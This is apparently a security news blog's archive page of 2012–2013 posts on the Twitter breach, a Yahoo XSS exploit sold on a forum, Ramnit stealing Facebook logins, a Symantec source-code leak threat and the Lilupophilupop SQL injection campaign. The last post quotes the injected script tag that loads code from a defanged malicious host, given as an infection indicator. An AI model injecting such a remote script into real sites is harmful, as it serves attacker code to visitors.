Category: Website Hacking

Feb 02 2013

Twitter Hacked – 250,000 Accounts Compromised

Twitter HackedIn a blog post last Friday, Twitter’s Director of Information Security Bob Lord, said the company had discovered a major attack and shut it down almost immediately, but the attackers may have had access to user names, email addresses, session tokens and passwords for approximately 250,000 users.

Lord said that Twitter detected unusual access patterns that led to it identifying unauthorised access attempts to Twitter user data.

“We discovered one live attack and were able to shut it down in process moments later. As a precautionary security measure, we have reset passwords and revoked session tokens for these accounts. If your account was one of them, you will have recently received (or will shortly) an email from us at the address associated with your Twitter account notifying you that you will need to create a new password. Your old password will not work when you try to log in to Twitter.

Though only a very small percentage of our users were potentially affected by this attack, we encourage all users to take this opportunity to ensure that they are following good password hygiene, on Twitter and elsewhere on the Internet. Make sure you use a strong password – at least ten (but more is better) characters and a mixture of upper- and lowercase letters, numbers, and symbols – that you are not using for any other accounts or sites.

Using the same password for multiple online accounts significantly increases your odds of being compromised. If you are not using good password hygiene, take a moment now to change your Twitter passwords. We also echo the advisory from the US Department of Homeland Security and security experts to encourage users to disable Java on their computers in their browsers”.

The attack follows hacks into a number of major media outlets, including The Washington Post, The New York Times, and The Wall Street Journal. Unnamed sources quoted by the newspapers say they suspect Chinese hackers, possibly associated with the Chinese government, to be involved.

Twitter have not mention that how hackers were able to infiltrate Twitter’s systems, but Twitter’s blog post alluded that hackers had broken in through a zero-day vulnerability in Oracle’s Java software.

Nov 28 2012

Yahoo Account Exploit Selling on Black Market

Yahoo ExploitYahoo is investigating the claims of a hacker who is selling an exploit that apparently hijacks Yahoo mail accounts.

The exploit, being sold for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a cross-site scripting (XSS) weakness in yahoo.com that lets attackers steal cookies from Yahoo! Webmail users.

Such a flaw would let attackers send or read email from the victim’s account. In a typical XSS attack, an attacker sends a malicious link to an unsuspecting user; if the user clicks the link, the script is executed, and can access cookies, session tokens or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

Demonstrating an apparent flair for marketing, the hacker, under the alias “TheHell” also posted a video on YouTube, providing a demo for potential customers. He claims it works with all browsers and does not require a bypass of XSS filters in either Chrome or Internet Explorer. He also says the exploit will be sold only to trusted individuals who are not likely to turn it over to Yahoo, which would undoubtedly develop a patch that will foil the attack.

“TheHell” claims that his exploit attacks a “stored” XSS flaw. This type of attack injects a code that is permanently stored on targeted servers until it is found and deleted. The malicious code is then passed to the victim’s machine when that particular server is accessed for legitimate download.

A standard phishing attempt is used to access the user’s cookies, from which the attacker can access the person’s email, or take full control of the account.

As of Tuesday morning, Yahoo was in the process of trying to identify the infected URL. Once the identification is successful, the malicious portion of code will be deleted.

Jan 06 2012

Ramnit Worm Targets Facebook, Over 45,000 Accounts Compromised

Ramnit Worm FacebookMuch has been written about the Ramnit worm and its transformation into a financial malware. And now, Seculert’s research lab has discovered that Ramnit recently started targeting Facebook accounts with considerable success, stealing over 45,000 Facebook login credentials worldwide, mostly from people in the UK and France.

Discovered in April 2010, the Microsoft Malware Protection Center (MMPC) described Ramnit as “a multi-component malware family which infects Windows executable as well as HTML files”, “stealing sensitive information such as stored FTP credentials and browser cookies”. In July 2011 a Symantec report estimated that Ramnit worm variants accounted for 17.3 percent of all new malicious software infections.

In August 2011, Trusteer reported that Ramnit went ‘financial’. Following the leakage of the ZeuS source-code in May, it has been suggested that the hackers behind Ramnit merged several financial-fraud spreading capabilities to create a “Hybrid creature” which was empowered by both the scale of the Ramnit infection and the ZeuS financial data-sniffing capabilities.

With the recent ZeuS Facebook worm and this latest Ramnit variant, it appears that sophisticated hackers are now experimenting with replacing the old-school email worms with more up-to-date social network worms. As demonstrated by the 45,000 compromised Facebook subscribers, the viral power of social networks can be manipulated to cause considerable damage to individuals and institutions when it is in the wrong hands.

Seculert has provided Facebook with all of the stolen credentials that were found on the Ramnit servers.

Jan 05 2012

Hackers Threaten to Post Source Code for Symantec Product

Symantec Source Code StolenHackers have posted a file online that they claim is a confidential glimpse into Symantec’s Norton Antivirus program and have threatened to release source code for the security giant’s flagship antivirus product.

The hacker group, which calls itself the Lords of Dharmaraja, posted a file on Pastebin that it said described the confidential workings of Symantec’s Norton Antivirus threat-detection product. The documentation, and any source code, could be exploited by hackers to corrupt the antivirus program or write malicious code that circumvents Norton’s product altogether. The original post is no longer on Pastebin, although there is a Google cache.

The hackers claim to have discovered Symantec’s source code in a hack they conducted on India’s military and intelligence servers. In their online post, the hackers said, “We have discovered within the Indian Spy Program source codes of a dozen software companies,” which the hackers said had signed agreements with an Indian defense program and India’s Central Bureau of Investigation.

In an e-mail, a Symantec spokesman, Cris Paden, said the hackers’ post was an outdated document from 1999 that “explains how the software is designed to work (what inputs are accepted and what outputs are generated) and contains function names, but there is no actual source code present.”

The hacker group threatened to release the actual source code for the Norton AntiVirus software later on. “We are working out mirrors as of now,” the hackers wrote in their post.

Mr. Paden said Symantec was “currently investigating that.”

Symantec’s Norton brand antivirus products make up the bulk of its sales to consumers, which totaled nearly $2 billion last year — a third of Symantec’s revenue. If any part of its source code was exploited or tampered with, it could hurt Symantec’s share price and bottom line.

“If this document is from 1999, chances are the source code has changed a fair bit,” said Robert Rachwald, director of security strategy at Imperva, an Internet security company. ”But if Symantec hasn’t done any major overhauls, there may be some parts of the code that remain intact,” he said, and someone could find a way to poke holes in it.

Jan 01 2012

Lilupophilupop SQL Injection Tops 1 Million Infected Pages

Lilupophilupop SQL InjectionA SQL attack which is increasing at extremely fast rates has been uncovered by ISC ( Internet Storm Center ) has seen to raise from just a few hundred pages to over 1 million in just a few weeks.

From the past few weeks of going over submitted results and information from interweb users they have put together some interesting data, one it seems to be targeting windows based servers and from the logs it seems they had been doing a bit of probing around within the weeks before the sites been injected with a special string:

“></title><script src=”hXXp://lilupophilupop.com/sl.php”></script>

They have also put together fairly solid base of ccTLD’s statistics of which have been infected (as shown below) -

  • UK – 56,300
  • NL – 123,000
  • DE – 49,700
  • FR – 68,100
  • DK – 31,000
  • CN – 505
  • CA – 16,600
  • COM – 30,500
  • RU – 32,000
  • JP – 23,200
  • ORG – 2,690

At the moment it looks like it is partially automated and partially manual. The manual component and the number of sites infected suggests a reasonable size work force or a long preparation period.

If you want to find out if you have a problem just search for “<script src=”http://lilupophilupop.com/” in google and use the site: parameter to hone in on your domain.

Original Findings and Comments: ISC Diary | SQL Injection Attack happening ATM